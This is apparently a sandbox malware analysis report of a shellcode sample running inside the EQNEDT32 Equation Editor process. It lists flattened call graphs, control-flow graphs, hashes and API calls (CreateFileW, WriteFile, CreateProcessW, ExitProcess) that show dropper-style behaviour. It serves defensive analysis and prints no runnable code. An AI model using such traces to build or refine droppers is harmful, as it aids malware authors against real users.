2212->2213 2214 35607ac 10 API calls 2213->2214 2220 356079c 2214->2220 2215 356082a 5 API calls 2218 356081a 2215->2218 2216 356087b 2222 356088a ExitProcess 2216->2222 2229 35608c2 2216->2229 2217 35607f9 2219 356080d 7 API calls 2217->2219 2218->2216 2223 356084b 3 API calls 2218->2223 2225 3560894 2218->2225 2221 3560801 2219->2221 2220->2217 2220->2221 2224 35607ec WriteFile 2220->2224 2221->2215 2226 356083c 2223->2226 2224->2220 2225->2095 2226->2225 2227 356084a CreateProcessW 2226->2227 2228 3560887 ExitProcess 2227->2228 2228->2216 2229->2095 2230 356088e GetPEB 2231 3560896 2230->2231 2232 356057a ExitProcess 2281 3560593 2232->2281 2234 3560586 2237 3560611 2234->2237 2243 35605eb 2234->2243 2244 35605ac 2234->2244 2235 356067e 2238 3560692 37 API calls 2235->2238 2236 3560619 2239 3560681 2236->2239 2240 356061c 2236->2240 2373 3560622 2237->2373 2238->2239 2245 35606b9 34 API calls 2239->2245 2242 3560637 CreateFileW 2240->2242 2246 3560659 44 API calls 2242->2246 2243->2235 2243->2236 2244->2242 2250 3560642 2244->2250 2251 35605d0 2244->2251 2247 356069f 2245->2247 2253 3560649 2246->2253 2248 3560731 2247->2248 2249 35606cc 2247->2249 2258 3560752 19 API calls 2248->2258 2270 356073b 2248->2270 2255 35606e6 2249->2255 2256 35606f8 28 API calls 2249->2256 2249->2270 2252 3560659 44 API calls 2250->2252 2250->2253 2331 356060f 2251->2331 2252->2253 2259 3560792 2255->2259 2262 3560720 2255->2262 2256->2255 2257 356076e 16 API calls 2261 3560764 2257->2261 2260 3560737 2258->2260 2266 35607ac 10 API calls 2259->2266 2260->2259 2260->2261 2260->2270 2263 35607f9 2261->2263 2264 3560769 2261->2264 2268 35607ec WriteFile 2261->2268 2269 3560801 2261->2269 2267 3560752 19 API calls 2262->2267 2265 356080d 7 API calls 2263->2265 2265->2269 2266->2261 2267->2270 2268->2261 2271 356082a 5 API calls 2269->2271 2270->2257 2270->2261 2272 356081a 2271->2272 2274 356084b 3 API calls 2272->2274 2275 3560894 2272->2275 2279 356087b 2272->2279 2273 356088a ExitProcess 2276 356083c 2274->2276 2276->2275 2277 356084a CreateProcessW 2276->2277 2278 3560887 ExitProcess 2277->2278 2278->2279 2279->2273 2280 35608c2 2279->2280 2282 3560599 2281->2282 2378 35605af 2282->2378 2284 35605a0 2287 3560611 2284->2287 2293 35605eb 2284->2293 2294 35605ac 2284->2294 2285 356067e 2288 3560692 37 API calls 2285->2288 2286 3560619 2289 3560681 2286->2289 2290 356061c 2286->2290 2291 3560622 45 API calls 2287->2291 2288->2289 2295 35606b9 34 API calls 2289->2295 2292 3560637 CreateFileW 2290->2292 2291->2293 2296 3560659 44 API calls 2292->2296 2293->2285 2293->2286 2294->2292 2300 3560642 2294->2300 2301 35605d0 2294->2301 2297 356069f 2295->2297 2303 3560649 2296->2303 2298 3560731 2297->2298 2299 35606cc 2297->2299 2306 356073b 2298->2306 2309 3560752 19 API calls 2298->2309 2305 35606f8 28 API calls 2299->2305 2299->2306 2308 35606e6 2299->2308 2302 3560659 44 API calls 2300->2302 2300->2303 2304 356060f 49 API calls 2301->2304 2302->2303 2304->2293 2305->2308 2307 356076e 16 API calls 2306->2307 2318 3560764 2306->2318 2307->2318 2310 3560792 2308->2310 2312 3560720 2308->2312 2311 3560737 2309->2311 2316 35607ac 10 API calls 2310->2316 2311->2306 2311->2310 2311->2318 2317 3560752 19 API calls 2312->2317 2313 35607f9 2315 356080d 7 API calls 2313->2315 2314 3560769 2314->2234 2320 3560801 2315->2320 2316->2318 2317->2306 2318->2313 2318->2314 2319 35607ec WriteFile 2318->2319 2318->2320 2319->2318 2321 356082a 5 API calls 2320->2321 2322 356081a 2321->2322 2324 356084b 3 API calls 2322->2324 2325 3560894 2322->2325 2329 356087b 2322->2329 2323 356088a ExitProcess 2326 356083c 2324->2326 2325->2234 2326->2325 2327 356084a CreateProcessW 2326->2327 2328 3560887 ExitProcess 2327->2328 2328->2329 2329->2323 2330 35608c2 2329->2330 2330->2234 2332 3560611 2331->2332 2333 3560622 45 API calls 2332->2333 2334 3560616 2333->2334 2335 356067e 2334->2335 2336 3560619 2334->2336 2337 3560692 37 API calls 2335->2337 2338 3560681 2336->2338 2339 356061c CreateFileW 2336->2339 2337->2338 2341 35606b9 34 API calls 2338->2341 2342 3560659 44 API calls 2339->2342 2343 356069f 2341->2343 2346 3560649 2342->2346 2344 3560731 2343->2344 2345 35606cc 2343->2345 2350 3560752 19 API calls 2344->2350 2362 356073b 2344->2362 2347 35606e6 2345->2347 2348 35606f8 28 API calls 2345->2348 2345->2362 2351 3560792 2347->2351 2354 3560720 2347->2354 2348->2347 2349 356076e 16 API calls 2353 3560764 2349->2353 2352 3560737 2350->2352 2358 35607ac 10 API calls 2351->2358 2352->2351 2352->2353 2352->2362 2355 35607f9 2353->2355 2356 3560769 2353->2356 2360 35607ec WriteFile 2353->2360 2361 3560801 2353->2361 2359 3560752 19 API calls 2354->2359 2357 356080d 7 API calls 2355->2357 2356->2243 2357->2361 2358->2353 2359->2362 2360->2353 2363 356082a 5 API calls 2361->2363 2362->2349 2362->2353 2365 356081a 2363->2365 2364 356087b 2366 356088a ExitProcess 2364->2366 2372 35608c2 2364->2372 2365->2364 2367 356084b 3 API calls 2365->2367 2368 3560894 2365->2368 2369 356083c 2367->2369 2368->2243 2369->2368 2370 356084a CreateProcessW 2369->2370 2371 3560887 ExitProcess 2370->2371 2371->2364 2372->2243 2374 3560625 CreateFileW 2373->2374 2376 3560659 44 API calls 2374->2376 2377 3560649 2376->2377 2379 35605b5 2378->2379 2425 35605d6 2379->2425 2381 3560637 CreateFileW 2383 3560659 44 API calls 2381->2383 2382 35605bc 2382->2381 2384 3560642 2382->2384 2385 35605d0 2382->2385 2389 3560649 2383->2389 2386 3560659 44 API calls 2384->2386 2384->2389 2387 356060f 49 API calls 2385->2387 2386->2389 2388 35605eb 2387->2388 2390 356067e 2388->2390 2391 3560619 2388->2391 2392 3560692 37 API calls 2390->2392 2393 3560681 2391->2393 2394 356061c 2391->2394 2392->2393 2395 35606b9 34 API calls 2393->2395 2394->2381 2396 356069f 2395->2396 2397 3560731 2396->2397 2398 35606cc 2396->2398 2402 3560752 19 API calls 2397->2402 2414 356073b 2397->2414 2399 35606e6 2398->2399 2400 35606f8 28 API calls 2398->2400 2398->2414 2403 3560792 2399->2403 2406 3560720 2399->2406 2400->2399 2401 356076e 16 API calls 2405 3560764 2401->2405 2404 3560737 2402->2404 2410 35607ac 10 API calls 2403->2410 2404->2403 2404->2405 2404->2414 2407 35607f9 2405->2407 2408 3560769 2405->2408 2412 35607ec WriteFile 2405->2412 2413 3560801 2405->2413 2411 3560752 19 API calls 2406->2411 2409 356080d 7 API calls 2407->2409 2408->2284 2409->2413 2410->2405 2411->2414 2412->2405 2415 356082a 5 API calls 2413->2415 2414->2401 2414->2405 2417 356081a 2415->2417 2416 356087b 2418 356088a ExitProcess 2416->2418 2424 35608c2 2416->2424 2417->2416 2419 356084b 3 API calls 2417->2419 2420 3560894 2417->2420 2421 356083c 2419->2421 2420->2284 2421->2420 2422 356084a CreateProcessW 2421->2422 2423 3560887 ExitProcess 2422->2423 2423->2416 2424->2284 2426 35605d9 2425->2426 2427 356060f 49 API calls 2426->2427 2428 35605eb 2427->2428 2429 356067e 2428->2429 2430 3560619 2428->2430 2431 3560692 37 API calls 2429->2431 2432 3560681 2430->2432 2433 356061c CreateFileW 2430->2433 2431->2432 2435 35606b9 34 API calls 2432->2435 2436 3560659 44 API calls 2433->2436 2437 356069f 2435->2437 2440 3560649 2436->2440 2438 3560731 2437->2438 2439 35606cc 2437->2439 2444 3560752 19 API calls 2438->2444 2456 356073b 2438->2456 2441 35606e6 2439->2441 2442 35606f8 28 API calls 2439->2442 2439->2456 2445 3560792 2441->2445 2448 3560720 2441->2448 2442->2441 2443 356076e 16 API calls 2447 3560764 2443->2447 2446 3560737 2444->2446 2452 35607ac 10 API calls 2445->2452 2446->2445 2446->2447 2446->2456 2449 35607f9 2447->2449 2450 3560769 2447->2450 2454 35607ec WriteFile 2447->2454 2455 3560801 2447->2455 2453 3560752 19 API calls 2448->2453 2451 356080d 7 API calls 2449->2451 2450->2382 2451->2455 2452->2447 2453->2456 2454->2447 2457 356082a 5 API calls 2455->2457 2456->2443 2456->2447 2459 356081a 2457->2459 2458 356087b 2460 356088a ExitProcess 2458->2460 2466 35608c2 2458->2466 2459->2458 2461 356084b 3 API calls 2459->2461 2462 3560894 2459->2462 2463 356083c 2461->2463 2462->2382 2463->2462 2464 356084a CreateProcessW 2463->2464 2465 3560887 ExitProcess 2464->2465 2465->2458 2466->2382

                                                                                              Callgraph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              • Opacity -> Relevance
                                                                                              • Disassembly available
                                                                                              callgraph 0 Function_035605D6 2 Function_03560752 0->2 4 Function_03560692 0->4 7 Function_03560659 0->7 8 Function_03560887 0->8 15 Function_0356060F 0->15 17 Function_0356080D 0->17 18 Function_0356084B 0->18 20 Function_035608B6 0->20 23 Function_035606F8 0->23 24 Function_035606B9 0->24 28 Function_0356076E 0->28 30 Function_035607AC 0->30 33 Function_0356082A 0->33 1 Function_035606D5 1->2 1->8 1->17 1->18 1->20 1->23 1->28 1->30 1->33 2->8 2->17 2->18 2->20 2->28 2->33 3 Function_03560792 3->8 3->17 3->18 3->20 3->30 3->33 4->2 4->8 4->17 4->18 4->20 4->23 4->24 4->28 4->30 4->33 5 Function_03560593 5->2 5->4 5->7 5->8 9 Function_03560907 5->9 5->15 5->17 5->18 5->20 5->23 5->24 25 Function_03560622 5->25 5->28 29 Function_035605AF 5->29 5->30 5->33 6 Function_035601DC 7->2 7->4 7->8 7->17 7->18 7->20 7->23 7->24 27 Function_0356066E 7->27 7->28 7->30 7->33 10 Function_03560285 11 Function_03560705 11->2 11->8 11->17 11->18 11->20 26 Function_03560721 11->26 11->28 11->30 11->33 12 Function_03560102 13 Function_03560000 14 Function_0356088E 14->20 15->2 15->4 15->7 15->8 15->17 15->18 15->20 15->23 15->24 15->25 15->28 15->30 15->33 16 Function_0356020C 17->8 17->18 17->20 17->33 18->8 19 Function_0356024B 21 Function_035602BC 22 Function_0356057A 22->2 22->4 22->5 22->7 22->8 22->15 22->17 22->18 22->20 22->23 22->24 22->25 22->28 22->30 22->33 23->2 23->8 23->11 23->17 23->18 23->20 23->28 23->30 23->33 24->1 24->2 24->8 24->17 24->18 24->20 24->23 24->28 24->30 24->33 25->7 26->2 26->8 26->17 26->18 26->20 26->28 26->33 27->2 27->4 27->8 27->17 27->18 27->20 27->23 27->24 27->28 27->30 27->33 28->3 28->8 28->17 28->18 28->20 28->30 28->33 29->0 29->2 29->4 29->7 29->8 29->9 29->15 29->17 29->18 29->20 29->23 29->24 29->28 29->30 29->33 30->8 30->17 30->18 30->20 30->33 31 Function_0356012C 32 Function_0356016A 33->8 33->18 33->20

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 356076e-3560780 call 3560792 4 35607e7-35607e8 0->4 5 3560782 0->5 8 35607ec-35607f7 WriteFile 4->8 6 3560784-3560786 5->6 7 35607fd-3560804 5->7 9 3560788-3560789 6->9 10 35607e9 6->10 11 3560806-356080b 7->11 12 35607b1-35607b6 8->12 9->8 13 356078b-35607a9 call 35607ac 9->13 14 356080f-356081e call 356082a 10->14 15 35607eb 10->15 11->14 21 35607bc-35607c2 12->21 26 356080c 13->26 27 35607ab-35607af 13->27 34 3560820 14->34 35 3560881-3560885 14->35 15->8 24 35607c4-35607c9 21->24 25 35607f9-3560804 call 356080d 21->25 31 35607d0-35607e3 24->31 32 35607cb-35607ce 24->32 25->11 26->14 27->12 31->4 32->31 38 3560896-3560899 34->38 39 3560822 34->39 41 3560887-356088c ExitProcess 35->41 44 356089c-356089e 38->44 42 3560894 39->42 43 3560824-356083d call 356084b 39->43 42->38 53 35608a4-35608a6 call 35608b6 43->53 54 356083f-3560840 43->54 46 35608a1-35608ad call 35608b6 44->46 46->44 52 35608af-35608b3 46->52 56 35608a7-35608ad 53->56 54->56 57 3560842-3560843 54->57 56->44 56->52 58 35608b4 57->58 59 3560845-3560848 57->59 59->46 60 356084a-3560876 CreateProcessW call 3560887 59->60 62 356087b-356087c 60->62 63 35608e7-35608eb 62->63 64 356087e 62->64 65 35608ef 63->65 66 35608ed 63->66 67 35608d0 64->67 68 3560880 64->68 70 35608f1-35608f3 65->70 73 35608f5-35608fe 65->73 66->70 71 35608d2-35608d6 67->71 72 35608d8-35608dc 67->72 69 3560882-3560885 68->69 68->70 69->41 74 3560903-3560904 70->74 71->72 76 35608e4 71->76 72->70 77 35608de-35608e2 72->77 78 35608c7-35608ca 73->78 79 3560900 73->79 76->63 77->70 77->76 78->73 80 35608cc 78->80 79->74 80->67
                                                                                              APIs
                                                                                                • Part of subcall function 03560792: WriteFile.KERNELBASE(035606E6,035606FD,00000000,00000000,00000000,?,035606FD,035606E6,00000000,00000000,00000000,00000000,0356069F,00000050,00000000), ref: 035607F5
                                                                                              • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0356083C,?,0356081A), ref: 03560874
                                                                                              • ExitProcess.KERNELBASE(00000000,?,0356087B,?,0356083C,?,0356081A,?,?,03560801,00000000,00000000,00000000,00000000,0356069F,00000050), ref: 0356088C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CreateExitFileWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3739231918-0
                                                                                              • Opcode ID: 8902a9f3f46b759cffbabbce9294685ea310c3593259839d3d59cbc6f9c6f742
                                                                                              • Instruction ID: 6219c9c861221758e6775670b80362cbfb29ce718c51103c14e014f0d99d7b57
                                                                                              • Opcode Fuzzy Hash: 8902a9f3f46b759cffbabbce9294685ea310c3593259839d3d59cbc6f9c6f742
                                                                                              • Instruction Fuzzy Hash: D931F47540C3415ACB15EBA4ED81AAEFB69FFC1700F18AD4DA0924B0F2D9B0C5099AE1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 81 35607ac-35607af 83 35607b1-35607c2 81->83 87 35607c4-35607c9 83->87 88 35607f9-356081e call 356080d call 356082a 83->88 89 35607d0-35607f7 WriteFile 87->89 90 35607cb-35607ce 87->90 103 3560820 88->103 104 3560881-3560885 88->104 89->83 90->89 105 3560896-3560899 103->105 106 3560822 103->106 107 3560887-356088c ExitProcess 104->107 110 356089c-356089e 105->110 108 3560894 106->108 109 3560824-356083d call 356084b 106->109 108->105 119 35608a4-35608a6 call 35608b6 109->119 120 356083f-3560840 109->120 112 35608a1-35608ad call 35608b6 110->112 112->110 118 35608af-35608b3 112->118 122 35608a7-35608ad 119->122 120->122 123 3560842-3560843 120->123 122->110 122->118 124 35608b4 123->124 125 3560845-3560848 123->125 125->112 126 356084a-3560876 CreateProcessW call 3560887 125->126 128 356087b-356087c 126->128 129 35608e7-35608eb 128->129 130 356087e 128->130 131 35608ef 129->131 132 35608ed 129->132 133 35608d0 130->133 134 3560880 130->134 136 35608f1-35608f3 131->136 139 35608f5-35608fe 131->139 132->136 137 35608d2-35608d6 133->137 138 35608d8-35608dc 133->138 135 3560882-3560885 134->135 134->136 135->107 140 3560903-3560904 136->140 137->138 142 35608e4 137->142 138->136 143 35608de-35608e2 138->143 144 35608c7-35608ca 139->144 145 3560900 139->145 142->129 143->136 143->142 144->139 146 35608cc 144->146 145->140 146->133
                                                                                              APIs
                                                                                              • WriteFile.KERNELBASE(035606E6,035606FD,00000000,00000000,00000000,?,035606FD,035606E6,00000000,00000000,00000000,00000000,0356069F,00000050,00000000), ref: 035607F5
                                                                                              • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0356083C,?,0356081A), ref: 03560874
                                                                                              • ExitProcess.KERNELBASE(00000000,?,0356087B,?,0356083C,?,0356081A,?,?,03560801,00000000,00000000,00000000,00000000,0356069F,00000050), ref: 0356088C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CreateExitFileWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3739231918-0
                                                                                              • Opcode ID: d26a8295f2a3bfc1efaa8aa04e95a18b127ffe2b33cb040d0da394256dcd0fb0
                                                                                              • Instruction ID: 01dfccfc3fe26ee6af7a64718718370015bae33a110db9f4488d5a671ad5f5b2
                                                                                              • Opcode Fuzzy Hash: d26a8295f2a3bfc1efaa8aa04e95a18b127ffe2b33cb040d0da394256dcd0fb0
                                                                                              • Instruction Fuzzy Hash: 7121927540C3415ADB11EB64ED80AAFBB69FFC1700F18AD5DB192470F6DAB0C5089BE6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 147 3560792-35607a9 call 35607ac 151 356080c 147->151 152 35607ab-35607af 147->152 154 356080f-356081e call 356082a 151->154 155 35607b1-35607c2 152->155 163 3560820 154->163 164 3560881-3560885 154->164 165 35607c4-35607c9 155->165 166 35607f9-356080b call 356080d 155->166 167 3560896-3560899 163->167 168 3560822 163->168 171 3560887-356088c ExitProcess 164->171 169 35607d0-35607f7 WriteFile 165->169 170 35607cb-35607ce 165->170 166->154 176 356089c-356089e 167->176 173 3560894 168->173 174 3560824-356083d call 356084b 168->174 169->155 170->169 173->167 190 35608a4-35608a6 call 35608b6 174->190 191 356083f-3560840 174->191 179 35608a1-35608ad call 35608b6 176->179 179->176 189 35608af-35608b3 179->189 193 35608a7-35608ad 190->193 191->193 194 3560842-3560843 191->194 193->176 193->189 195 35608b4 194->195 196 3560845-3560848 194->196 196->179 197 356084a-3560876 CreateProcessW call 3560887 196->197 199 356087b-356087c 197->199 200 35608e7-35608eb 199->200 201 356087e 199->201 202 35608ef 200->202 203 35608ed 200->203 204 35608d0 201->204 205 3560880 201->205 207 35608f1-35608f3 202->207 210 35608f5-35608fe 202->210 203->207 208 35608d2-35608d6 204->208 209 35608d8-35608dc 204->209 206 3560882-3560885 205->206 205->207 206->171 211 3560903-3560904 207->211 208->209 213 35608e4 208->213 209->207 214 35608de-35608e2 209->214 215 35608c7-35608ca 210->215 216 3560900 210->216 213->200 214->207 214->213 215->210 217 35608cc 215->217 216->211 217->204
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CreateExitFileWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3739231918-0
                                                                                              • Opcode ID: c5436491b0ee0ada25d89b9c3df2f49498131499da4c35b77578a281c67f4d9d
                                                                                              • Instruction ID: 67b31ba324973819f7934debdcc45dbcac7db156326a5eadd31e12ba6b72318e
                                                                                              • Opcode Fuzzy Hash: c5436491b0ee0ada25d89b9c3df2f49498131499da4c35b77578a281c67f4d9d
                                                                                              • Instruction Fuzzy Hash: 0B21957140C3416ACB11EB64DC84AAFFBA9FFC1740F18AD5CB192470B5DAB0C5089BE1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 218 356057a-35605a1 ExitProcess call 3560593 221 35605f4-3560617 218->221 222 35605a4-35605a9 218->222 225 356067e-356068e call 3560692 221->225 226 3560619-356061a 221->226 227 3560611-3560617 call 3560622 222->227 228 35605ac-35605c6 222->228 234 3560695-35606ca call 35606b9 225->234 230 3560681-356068e 226->230 231 356061c-3560632 226->231 227->225 227->226 236 3560637-3560644 CreateFileW call 3560659 228->236 242 35605c8-35605ce 228->242 230->234 231->236 246 3560731 234->246 247 35606cc-35606ce 234->247 244 3560649-3560657 236->244 249 3560642 242->249 250 35605d0-35605f3 call 356060f 242->250 251 3560757-3560765 call 356076e 246->251 252 3560733-356073f call 3560752 246->252 253 3560746-3560747 247->253 254 35606d1 247->254 249->244 257 3560644 call 3560659 249->257 250->221 281 3560767 251->281 282 35607d0-35607f7 WriteFile 251->282 275 35607b5 252->275 285 3560741 252->285 259 3560748-356074a 253->259 261 35607ae-35607af 253->261 258 35606d4-35606df 254->258 254->259 257->244 265 35606e6-356071a 258->265 266 35606e1 call 35606f8 258->266 267 356074d-356074f 259->267 262 35607b1 261->262 262->275 277 3560792 265->277 278 356071d 265->278 266->265 273 35607b6-35607c2 267->273 274 3560751-3560755 267->274 286 35607c4-35607c9 273->286 287 35607f9-356080b call 356080d 273->287 274->251 275->273 290 3560795-35607a9 call 35607ac 277->290 283 3560794 278->283 284 3560720-3560747 call 3560752 278->284 288 35607ce 281->288 289 3560769-3560772 281->289 282->262 283->290 284->261 306 3560749-356074a 284->306 285->290 291 3560743 285->291 286->282 292 35607cb 286->292 307 356080f-356081e call 356082a 287->307 288->282 304 356080c 290->304 305 35607ab 290->305 291->253 292->288 304->307 305->261 306->267 312 3560820 307->312 313 3560881-3560885 307->313 314 3560896-3560899 312->314 315 3560822 312->315 316 3560887-356088c ExitProcess 313->316 319 356089c-356089e 314->319 317 3560894 315->317 318 3560824-356083d call 356084b 315->318 317->314 328 35608a4-35608a6 call 35608b6 318->328 329 356083f-3560840 318->329 321 35608a1-35608ad call 35608b6 319->321 321->319 327 35608af-35608b3 321->327 331 35608a7-35608ad 328->331 329->331 332 3560842-3560843 329->332 331->319 331->327 333 35608b4 332->333 334 3560845-3560848 332->334 334->321 335 356084a-356087c CreateProcessW call 3560887 334->335 338 35608e7-35608eb 335->338 339 356087e 335->339 340 35608ef 338->340 341 35608ed 338->341 342 35608d0 339->342 343 3560880 339->343 345 35608f1-35608f3 340->345 348 35608f5-35608fe 340->348 341->345 346 35608d2-35608d6 342->346 347 35608d8-35608dc 342->347 344 3560882-3560885 343->344 343->345 344->316 349 3560903-3560904 345->349 346->347 351 35608e4 346->351 347->345 352 35608de-35608e2 347->352 353 35608c7-35608ca 348->353 354 3560900 348->354 351->338 352->345 352->351 353->348 355 35608cc 353->355 354->349 355->342
                                                                                              APIs
                                                                                              • ExitProcess.KERNELBASE(03560568), ref: 0356057A
                                                                                                • Part of subcall function 03560593: CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 0356063F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateExitFileProcess
                                                                                              • String ID:
                                                                                              • API String ID: 2838702978-0
                                                                                              • Opcode ID: 12bbc4865405f4aace8b6125fd16fa87a3e660bb30c286f66737c75c3b4f91f4
                                                                                              • Instruction ID: 45cd0627cf366f25e936c8fe2995ea09c2a6a9d2dcd7a4a5c18697876c125f02
                                                                                              • Opcode Fuzzy Hash: 12bbc4865405f4aace8b6125fd16fa87a3e660bb30c286f66737c75c3b4f91f4
                                                                                              • Instruction Fuzzy Hash: 3C212EB584D3C05FD322C7606EAA794BF60BBA2600F1D86CA81C54F1F3D2A5920A93D6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 356 356080d-356081e call 356082a 362 3560820 356->362 363 3560881-3560885 356->363 364 3560896-3560899 362->364 365 3560822 362->365 366 3560887-356088c ExitProcess 363->366 369 356089c-356089e 364->369 367 3560894 365->367 368 3560824-356083d call 356084b 365->368 367->364 378 35608a4-35608a6 call 35608b6 368->378 379 356083f-3560840 368->379 371 35608a1-35608ad call 35608b6 369->371 371->369 377 35608af-35608b3 371->377 381 35608a7-35608ad 378->381 379->381 382 3560842-3560843 379->382 381->369 381->377 383 35608b4 382->383 384 3560845-3560848 382->384 384->371 385 356084a-3560876 CreateProcessW call 3560887 384->385 387 356087b-356087c 385->387 388 35608e7-35608eb 387->388 389 356087e 387->389 390 35608ef 388->390 391 35608ed 388->391 392 35608d0 389->392 393 3560880 389->393 395 35608f1-35608f3 390->395 398 35608f5-35608fe 390->398 391->395 396 35608d2-35608d6 392->396 397 35608d8-35608dc 392->397 394 3560882-3560885 393->394 393->395 394->366 399 3560903-3560904 395->399 396->397 401 35608e4 396->401 397->395 402 35608de-35608e2 397->402 403 35608c7-35608ca 398->403 404 3560900 398->404 401->388 402->395 402->401 403->398 405 35608cc 403->405 404->399 405->392
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CreateExit
                                                                                              • String ID:
                                                                                              • API String ID: 126409537-0
                                                                                              • Opcode ID: 8231ee5b18957d3648bc57fc975aece0ec9b201bd18f6de92825622497ed5a63
                                                                                              • Instruction ID: 477a743597596bfcc60ae269fddf7083ecacf97861d437d2e16adf29210f3ebe
                                                                                              • Opcode Fuzzy Hash: 8231ee5b18957d3648bc57fc975aece0ec9b201bd18f6de92825622497ed5a63
                                                                                              • Instruction Fuzzy Hash: 7211027540C3415ACB25FB68EC84AAAFB6AFFC0300F18B988E0924B1F6DA70C51497E4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 406 356084b-3560874 CreateProcessW 408 356087b-356087c 406->408 409 3560876 call 3560887 406->409 410 35608e7-35608eb 408->410 411 356087e 408->411 409->408 412 35608ef 410->412 413 35608ed 410->413 414 35608d0 411->414 415 3560880 411->415 417 35608f1-35608f3 412->417 420 35608f5-35608fe 412->420 413->417 418 35608d2-35608d6 414->418 419 35608d8-35608dc 414->419 416 3560882-356088c ExitProcess 415->416 415->417 422 3560903-3560904 417->422 418->419 424 35608e4 418->424 419->417 425 35608de-35608e2 419->425 426 35608c7-35608ca 420->426 427 3560900 420->427 424->410 425->417 425->424 426->420 429 35608cc 426->429 427->422 429->414
                                                                                              APIs
                                                                                              • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0356083C,?,0356081A), ref: 03560874
                                                                                                • Part of subcall function 03560887: ExitProcess.KERNELBASE(00000000,?,0356087B,?,0356083C,?,0356081A,?,?,03560801,00000000,00000000,00000000,00000000,0356069F,00000050), ref: 0356088C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CreateExit
                                                                                              • String ID:
                                                                                              • API String ID: 126409537-0
                                                                                              • Opcode ID: cc04445753e1ca6f8d30d3611a3f9dac58b0c92c2cdc5dffd7fbd729de51b4ed
                                                                                              • Instruction ID: 5a34fe6d813f0a592e026542f28e4bffaaf823365b6b5be662af9e09187378ce
                                                                                              • Opcode Fuzzy Hash: cc04445753e1ca6f8d30d3611a3f9dac58b0c92c2cdc5dffd7fbd729de51b4ed
                                                                                              • Instruction Fuzzy Hash: 5201F7E954C34251CB30E638A840BFAA775FBD1340FCCE95BA482071E6D1A481C397D9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 430 356082a-356083d call 356084b 435 35608a4-35608a6 call 35608b6 430->435 436 356083f-3560840 430->436 438 35608a7-35608ad 435->438 436->438 439 3560842-3560843 436->439 440 35608af-35608b3 438->440 441 356089c-356089e 438->441 442 35608b4 439->442 443 3560845-3560848 439->443 444 35608a1-35608ad call 35608b6 441->444 443->444 445 356084a-356087c CreateProcessW call 3560887 443->445 444->440 444->441 450 35608e7-35608eb 445->450 451 356087e 445->451 452 35608ef 450->452 453 35608ed 450->453 454 35608d0 451->454 455 3560880 451->455 457 35608f1-35608f3 452->457 460 35608f5-35608fe 452->460 453->457 458 35608d2-35608d6 454->458 459 35608d8-35608dc 454->459 456 3560882-356088c ExitProcess 455->456 455->457 462 3560903-3560904 457->462 458->459 464 35608e4 458->464 459->457 465 35608de-35608e2 459->465 466 35608c7-35608ca 460->466 467 3560900 460->467 464->450 465->457 465->464 466->460 469 35608cc 466->469 467->462 469->454
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
